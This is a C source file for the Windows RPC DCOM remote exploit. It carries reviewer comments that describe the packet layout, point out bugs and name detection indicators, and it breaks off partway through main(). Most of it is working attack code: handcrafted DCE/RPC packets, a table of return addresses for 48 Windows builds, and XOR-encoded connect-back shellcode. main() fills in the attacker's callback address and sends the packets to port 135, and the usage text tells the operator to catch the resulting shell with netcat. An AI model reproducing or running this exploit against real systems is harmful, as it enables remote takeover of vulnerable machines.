
  1. ///////////////////////////////////////////////////////////////////////
  2. //                                                                   //
  3. //                                                                   // 
  4. //        Windows RPC DCOM Remote Exploit with 48 TARGETS            // 
  5. //                                                                   // 
  6. //                                                                   // 
  7. ///////////////////////////////////////////////////////////////////////
  8. //                                                                   // 
  9. //         English - French - Chinese - Polish - German              //
  10. //             Japanese - Korean - Mexican - Kenyan                  //
  11. //                                                                   //
  12. //      Tks to all world wide contributors (Public Property)         // 
  13. //                                                                   //
  14. //               New Targets ? contrib@k-otik.com                    //
  15. //                                                                   //
  16. ///////////////////////////////////////////////////////////////////////
  17.  
  18.  
  19.  
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <windows.h>
  23. #pragma comment(lib,"ws2_32")
  24.  
/* windows.h already provides DWORD as a typedef; this macro shadows it with
 * the same expansion (unsigned long is 32-bit on Win32), which is why the raw
 * pointer casts in main() such as *(DWORD *)(buf2+8) write exactly 4 bytes. */
#define DWORD unsigned long
/* Winsock state filled in by WSAStartup() in main(); there is no matching
 * WSACleanup() anywhere in this file. */
WSADATA wsa;
  27.  
/* First PDU main() sends to the target on TCP/135, before anything else.
 * The leading bytes (0x05 = DCE/RPC major version, 0x0B = bind packet type,
 * 0x03 = first+last fragment flags) mark this as a DCE/RPC bind request.
 * Line 3 carries a little-endian interface UUID (appears to decode to
 * 000001a0-0000-0000-c000-000000000046 — confirm with an RPC decoder) and
 * line 4/5 the NDR transfer-syntax UUID with version 2.0.
 * Detection note: a bind to this interface followed immediately by a large
 * request PDU is the on-the-wire shape that can be matched independently of
 * the XOR-masked payload that follows; nothing here is encrypted. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  34.  
/* Head of the second PDU: a DCE/RPC request (byte 2 = 0x00 = request type)
 * carrying the DCOM activation structures.  main() copies this to the start of
 * buf2 and then adds sizeof(sc)-0xc to the 32-bit fields at buf2 offsets 0x8,
 * 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0 and 0x18c — all inside this array — so
 * those are size/length fields that must agree with the payload spliced in
 * after request2 (the exact NDR meaning of each is not documented here; verify
 * with a protocol decoder).
 * The ASCII bytes 0x4D,0x45,0x4F,0x57 ("MEOW") appear three times (straddling
 * lines 10/11, and on lines 15 and 42); this marker is the signature that
 * begins a DCOM OBJREF and is a stable anchor for detection, since it is not
 * touched by any of the fix-ups in main(). */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  91.  
/* Second fragment of the request, placed directly before sc in buf2.  main()
 * adds sizeof(sc)/2 to the 32-bit values at offset 0 and offset 8 (both 0x20
 * here) before copying — consistent with them being UTF-16 character counts
 * for the string that follows, which starts with "\\" as wide chars
 * (0x5C,0x00,0x5C,0x00) and is continued by sc and request3.  Note that
 * main() modifies this global array in place rather than a copy. */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  95.  
/* Tail of the UTF-16 string begun in request2: "\C$\1234561111111111111111.doc"
 * as wide chars, terminated by 0x00,0x00.  Appended right after sc in buf2,
 * so the whole string on the wire is "\\" + sc + this fragment; the fixed
 * text here is another static anchor that survives the per-run patching. */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  102.  
  103.  
  104.  
  105. /* Myam add OFFSETS*/
  106.  
/* Per-target 4-byte little-endian addresses.  main() selects one by argv[4]
 * (0..47, in the order printed by the usage banner) and memcpy()s it over
 * sc[36..39].  Each is declared as a string literal, so sizeof() yields 5 and
 * the copy also writes the terminating NUL into sc[40].
 * The values are build-specific (OS / service pack / locale, per the trailing
 * comments) and are what makes this tool brittle: a mismatch does nothing
 * useful.  Several entries are duplicates of one another, and some comments
 * disagree with the variable names (win2knospken and win2ksp2ken are both
 * commented "sp1"; the author marked win2ksp1kr with "??"); treat the table as
 * the author's working notes, not as verified data.  The last three (big5)
 * carry no comment at all. */
char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1  same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] =  "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77";  /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77";  /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77";  /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77";  /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[]  = "\xfb\x7b\xa1\x71";
  155.  
  156.  
  157.  
  158. /* Test this offset
  159. ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
  160. Windows 2000 (no-service-pack) English 0x77e33f6d
  161. 0x77f92a9b
  162. 0x77e2afc5
  163. 0x772254b0 win2k3
  164. 0x77E829E3 / 0x77E83587 kokanin win2k sp3
  165. */    
/* Payload spliced into buf2 between request2 and request3 (sizeof(sc) counts
 * the string literal's trailing NUL).  Layout, as far as this file shows it:
 *   [0..35]   UTF-16 text ("FXNBFX..."), the visible part of the path string
 *   [36..39]  per-target address; main() overwrites it from the table above
 *             (the literal left here equals win2ksp4chi / win2ksp4big)
 *   [40..47]  eight bytes the author marked "??????????"; the NUL written by
 *             main()'s 5-byte memcpy lands on [40]
 *   then a short stub ending in "\x80\x30\x93" — consistent with an XOR-0x93
 *   decoding loop — and the encoded body ("// code"), into which main()
 *   patches the callback port at sc[330+0x30] and the callback IPv4 address
 *   at sc[335+0x30], both pre-masked with 0x93 bytes.
 * Defender notes: the body and the callback endpoint are XOR-masked on the
 * wire and the address/port differ per run, so byte signatures on this region
 * are brittle; the static framing (bindstr, the "MEOW" markers in request1,
 * the UTF-16 prefix here, request3) and an unexpected outbound TCP connection
 * from the targeted host to <connectback ip>:<cb port> (see the usage text in
 * main()) are the more reliable indicators. */
unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"


  "\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  //??????????


    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code 
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  210.  
/* Trailer appended after request3 as the last piece of buf2.  main() copies it
 * unchanged; the later length fix-ups all target offsets below 0x190 and
 * therefore stay within the request1 region at the front of buf2. */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  217.  
/*
 * Entry point.  Usage (from the banner below):
 *   <victim> <connectback ip> <cb port> <target>
 * Builds one DCE/RPC bind (bindstr) and one request PDU from the static
 * arrays above (request1 | request2 | sc | request3 | request4), patches the
 * per-target address and the XOR-masked callback endpoint into sc, and sends
 * both over TCP/135.  Win32/Winsock only (windows.h, WSAStartup, SOCKET_ERROR).
 *
 * NOTE(review) — facts about this 2003-era sample that an analyst should know:
 *  - nothing is encrypted; the bind and the request that follows are fully
 *    visible on the wire and are the natural place to detect this traffic;
 *  - the callback IP and port are XORed with 0x93 before being written into
 *    the payload, so they do not appear in clear text in the packet;
 *  - argv[4] is parsed with atoi() on every branch and never range-checked:
 *    non-numeric input becomes target 0, and a value above 47 leaves the
 *    literal address already present in sc untouched;
 *  - targets 37..47 all copy win2k3nospeng (only the sizeof() operand names
 *    the intended array), so the usage labels for those targets do not
 *    describe what is actually sent;
 *  - each address array is a 4-char string literal, so sizeof() is 5 and the
 *    memcpy also writes the NUL terminator into sc[40];
 *  - WSAStartup()'s result is ignored, recv() results are never examined,
 *    the socket is never closed and WSACleanup() is never called; every
 *    error path is exit(1).
 */
int main(int argc,char ** argv)
{
    int len, len1, sockfd;          /* sockfd is int although Winsock's socket() returns SOCKET */
    short port=135;                 /* fixed destination port (RPC endpoint mapper / DCOM) */
    struct hostent *he;
    struct sockaddr_in their_addr;  /* not zeroed as a whole; only sin_zero is cleared below */

    unsigned char buf1[0x1000];     /* receive scratch space; contents are never inspected */
    unsigned char buf2[0x1000];     /* the assembled request PDU */
    unsigned short port1;           /* callback port, network byte order, XOR 0x9393 */

    DWORD cb;                       /* callback IPv4 address from inet_addr(), XOR 0x93939393 */

    WSAStartup(MAKEWORD(2,0),&wsa); /* return value not checked */

    printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
    printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");

    /* Usage banner.  argc<5 is the only argument validation: it guarantees
     * argv[1..4] exist, nothing more.  The target list here is the index
     * order used by the if/else chain further down. */
    if(argc<5)
    {
        printf("[<$>] RPC Remote Windows Exploit\n");
        printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
        printf("[<$>] Thanks to b@digitalwaste.org + J°rgen_Haa° + woutiir  \n");
        printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
        printf("[<$>] On connect back nc -lp cbport\n");
        printf("[<$>] Targets: 0 WinNT English +sp4\n");
        printf("[<$>]          1 WinNT China +sp5\n");
        printf("[<$>]          2 WinNT China +sp6\n");
        printf("[<$>]          3 WinNT China +sp6a\n");
        printf("[<$>]          4 Win2k Polish nosp ver 5.00.2195\n");
        printf("[<$>]          5 Win2k Polish +sp3 ver 5.00.2195\n");
        printf("[<$>]          6 Win2k Spanish +sp4\n");
        printf("[<$>]          7 Win2k English nosp 1\n");
        printf("[<$>]          8 Win2k English nosp 2\n");
        printf("[<$>]          9 Win2k English +sp1\n");
        printf("[<$>]          10 Win2k English +sp2 1\n");
        printf("[<$>]           11 Win2k English +sp2 2\n");
        printf("[<$>]          12 Win2k English +sp3 1\n");
        printf("[<$>]          13 Win2k English +sp3 2\n");
        printf("[<$>]          14 Win2k English +sp4\n");
        printf("[<$>]          15 Win2k China nosp\n");
        printf("[<$>]          16 Win2k China +sp1\n");
        printf("[<$>]          17 Win2k China +sp2\n");
        printf("[<$>]          18 Win2k China +sp3\n");
        printf("[<$>]          19 Win2k China +sp4\n");
        printf("[<$>]          20 Win2k German +sp3\n");
        printf("[<$>]          21 Win2k Japanese nosp\n");
        printf("[<$>]          22 Win2k Japanese +sp1\n");
        printf("[<$>]          23 Win2k Japanese +sp2\n");
        printf("[<$>]          24 Win2k Korea nosp\n");
        printf("[<$>]          25 Win2k Korea +sp1\n");
        printf("[<$>]          26 Win2k Korea +sp2\n");
        printf("[<$>]          27 Win2k Mexican nosp\n");
        printf("[<$>]          28 Win2k Mexican +sp1\n");
        printf("[<$>]          29 Win2k Kenya nosp\n");
        printf("[<$>]          30 Win2k Kenya +sp1\n");
        printf("[<$>]          31 Win2k Kenya +sp2\n");
        printf("[<$>]          32 WinXP English nosp ver 5.1.2600\n");
        printf("[<$>]          33 WinXP English +sp1 1\n");
        printf("[<$>]          34 WinXP English +sp1 2\n");
        printf("[<$>]          35 WinXP English +sp2\n");
        printf("[<$>]          36 Win2k3 English nosp\n");
        printf("[<$>]          37 Win2k german sp3\n");
        printf("[<$>]          38 Win2k german sp4\n");
        printf("[<$>]          39 Win2k german sp4 2\n");
        printf("[<$>]          40 Winxp german sp1 2\n");
        printf("[<$>]          41 Win2k french sp1\n");
        printf("[<$>]          42 Win2k french sp4\n");
        printf("[<$>]          43 Winxp french sp0\n");
        printf("[<$>]          44 Winxp french sp1\n");
        printf("[<$>]          45 Win2k big5 sp3\n");
        printf("[<$>]          46 Win2k big5 sp4\n");
        printf("[<$>]          47 Winxp big5 sp0\n");

        exit(1);
    }

    /* Resolve the victim (IPv4 only; h_addr is the first address returned).
     * NOTE(review): on Win32, perror() reports errno, not the Winsock error
     * code (WSAGetLastError), so the message is unlikely to be informative. */
    if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
        perror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(port);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);
        exit(1);
    }

    /* Target selection: overwrite sc[36..39] with the chosen address.  argv[4]
     * is re-parsed by atoi() in every branch and never bounds-checked; the
     * source arrays are 4-char string literals, so each copy is 5 bytes and
     * the NUL terminator lands on sc[40]. */
    if(atoi(argv[4])==0)
        memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
    else if (atoi(argv[4])==1)
        memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
    else if (atoi(argv[4])==2)
        memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
    else if (atoi(argv[4])==3)
        memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
    else if (atoi(argv[4])==4)
        memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
    else if (atoi(argv[4])==5)
        memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
    else if (atoi(argv[4])==6)
        memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
    else if (atoi(argv[4])==7)
        memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
    else if (atoi(argv[4])==8)
        memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
    else if (atoi(argv[4])==9)
        memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
    else if (atoi(argv[4])==10)
        memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
    else if (atoi(argv[4])==11)
        memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
    else if (atoi(argv[4])==12)
        memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
    else if (atoi(argv[4])==13)
        memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
    else if (atoi(argv[4])==14)
        memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
    else if (atoi(argv[4])==15)
        memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
    else if (atoi(argv[4])==16)
        memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
    else if (atoi(argv[4])==17)
